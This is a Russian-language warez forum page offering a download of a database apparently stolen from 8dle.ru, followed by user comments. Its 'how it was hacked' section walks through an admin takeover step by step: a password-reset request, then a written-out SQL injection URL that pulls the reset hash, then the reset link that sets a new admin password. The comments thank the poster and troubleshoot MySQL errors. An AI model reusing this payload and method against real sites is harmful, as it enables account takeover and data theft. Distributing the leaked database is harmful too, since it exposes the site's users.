Мы в твиттере Мы в телеграме!

Провеббер » Web » Скрипты » База 8dle.ru

Набор в команду! Ведется набор в команду, для наполнения сайта новым, интересным контентом. Если у тебя есть предложения, свободное время, ты обладаешь интересным контентом, и хочешь поделиться с другими?
Обращайся к нам в ЛС группы Вконтакте.

База 8dle.ru

Данный материал предоставлен сайтом ProWebber.cc исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
Скачать бесплатно База 8dle.ru.



Скачать прямо сейчас:
8dle_2010-05-23_16-42_kkwht.sql.rar [2.12 Mb] (cкачиваний: 295)
MD5: a096ce990077c6d1ff6ec4040bee1484


Как взломали:

[hidden=10,10,200]на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением cool
И так мы снегерировали хешь, осталось только достать его из базы
http://8dle.ru/?do=forum&showtopic=23'+union+select+1,2,CONCAT_WS(0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1--

указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы *** >> Darknull:md5
Копируем хешь и идем на ссылку
8dle.ru/?do=lostpassword&douser=ID&lostid=md5

вот и перед вами новый админский пароль smile
Если все сделано верно то вы гений biggrin
P.S. 8dle.ru уже залатали востановление пароля
так что ищите свои методы взлома smile[/hidden]


Дополнительные ссылки на скачивание ТОЛЬКО для зарегистрированных


0
Просмотры: 7 664 :: Комментарии (56) :: :: Нужна помощь? Задайте вопрос на форуме ::
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

#41pernatik

  • 26 мая 2010 23:06
  • Регистрация: 4.02.2010
  • Был(а) онлайн: 5.05.2014
  • Комментариев: 122
  • 0
Так выходит что ли не сайт хакнули, а учетную запись на хостинге и слили все сайты с базами... видео тоже бы хотелось посмотреть

#42BETEPAH

  • 27 мая 2010 08:21
  • Регистрация: 12.03.2010
  • Был(а) онлайн: 11.08.2015
  • Комментариев: 293
  • 0
kzpromo, спс надо будет проверить и себя на такую уязвимость, но вопрос не в этом, как защитится от этого взлома
P.S. если будешь писать ответ на мой вопрос, то поставь хайд 20 biggrin

--------------------

#43kzpromo

  • 27 мая 2010 09:04
  • Регистрация: 11.09.2009
  • Был(а) онлайн: 10.12.2023
  • Комментариев: 90
  • 0
какого хуя удалили? ебанутые суки

#44Webber

  • 27 мая 2010 09:20
  • Регистрация: 5.07.2009
  • Был(а) онлайн: 21.11.2024
  • Комментариев: 1 797
  • 0
kzpromo,
удалил я, еще не пофиксили ласткомментс, там было видно.

--------------------

#45kzpromo

  • 27 мая 2010 09:46
  • Регистрация: 11.09.2009
  • Был(а) онлайн: 10.12.2023
  • Комментариев: 90
  • 0
)))) удивляешь biggrin
тогда в новость надо было добавить

#46free_style

  • 28 мая 2010 16:42
  • Регистрация: 27.04.2010
  • Был(а) онлайн: 19.12.2011
  • Комментариев: 35
  • 0
Цитата: nartuk
nartuk

нет пароли не от сайта а на пример определенного юзера у которого и Аськи такой пароль и от Админки и тд .. нужно знать самого чела...

#47nartuk

  • 31 мая 2010 02:31
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 22.10.2014
  • Комментариев: 220
  • 0
Спасибо за "Как взломали" smile

Видео будет ?

Цитата: free_style
нет пароли не от сайта а на пример определенного юзера у которого и Аськи такой пароль и от Админки и тд .. нужно знать самого чела...

Это вообще к чему было ?

--------------------

#48zasranec

  • 31 мая 2010 03:13
  • Регистрация: 25.10.2009
  • Был(а) онлайн: 30.07.2015
  • Комментариев: 195
  • 0
nartuk,
это походу
к
Цитата: free_style
короче ищем нужного вам пользователя 8DLE и бежим расшифровывать пароли)) xD

Цитата: nartuk
Там уже много поменяли. На сайте же написали меняйте пассворды.З.Ы. Было бы там что брутить

а потом уже идет
Цитата: free_style
нет пароли не от сайта а на пр...


#49drug53

  • 18 сентября 2010 19:29
  • Регистрация: 1.10.2009
  • Был(а) онлайн: 7.05.2012
  • Комментариев: 101
  • 0
не понимаю смысла сливания этих баз

#50M9CNIK

  • 3 октября 2010 22:53
  • Регистрация: 23.04.2010
  • Был(а) онлайн: 1.08.2011
  • Комментариев: 11
  • 0
у меня ошибка!!!
MySQL Error!
------------------------

The Error returned was:
Unknown column 'start' in 'field list'

Error Number:
1054

__________________

SELECT id, title, category, body, vote_num, start, end FROM 8dle_vote WHERE approve

появилось сразу после голосования в опросе((( dash

#51M9CNIK

  • 7 октября 2010 11:14
  • Регистрация: 23.04.2010
  • Был(а) онлайн: 1.08.2011
  • Комментариев: 11
  • 0
чё никто не знает как это исправить?!

всё я сам разобрался!!!
делаем забросы:
ALTER TABLE `dle_vote` ADD `start` timestamp
и потом
ALTER TABLE `dle_vote` ADD `end` timestamp

тока опрос не работает и незнаю что делать(((

#52Philips

  • 7 октября 2010 13:47
  • Регистрация: 14.04.2010
  • Был(а) онлайн: 10.07.2022
  • Комментариев: 19
  • 0
M9CNIK, Спс))

#53M9CNIK

  • 7 октября 2010 13:49
  • Регистрация: 23.04.2010
  • Был(а) онлайн: 1.08.2011
  • Комментариев: 11
  • 0
Philips,
незачто....
но проблемы на этом не заканчиваются.... покрайней мере с dle 9.0

#54Samec

  • 10 октября 2010 22:10
  • Регистрация: 16.09.2010
  • Был(а) онлайн: 20.06.2012
  • Комментариев: 7
  • 0
M9CNIK,
ставь DLE 8.3 и проблем проктически не будет....

#55hells

  • 14 октября 2010 20:46
  • Регистрация: 9.10.2010
  • Был(а) онлайн: 8.12.2010
  • Комментариев: 13
  • 0
Скоро будет выложен видеоролик о том как ломался 8dle.ru :))))

Ждёмс

#56userpro525

  • 21 января 2012 15:21
  • Регистрация: 19.03.2011
  • Был(а) онлайн: 12.08.2012
  • Комментариев: 81
  • 0
А смысл ломать сайт для слития базы, ведь там помимо текста ещё и изображения с файлами загрузить надо, а это гораздо проще сделать при помощи граббера и не нужно ничего ломать, можно любой сайт так слить

1 2 3
Предыдущая    Следующая
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Архив новостей
Ноябрь 2024 (9)
Октябрь 2024 (169)
Сентябрь 2024 (13)
Август 2024 (60)
Июль 2024 (12)
Июнь 2024 (30)

Последние комментарии: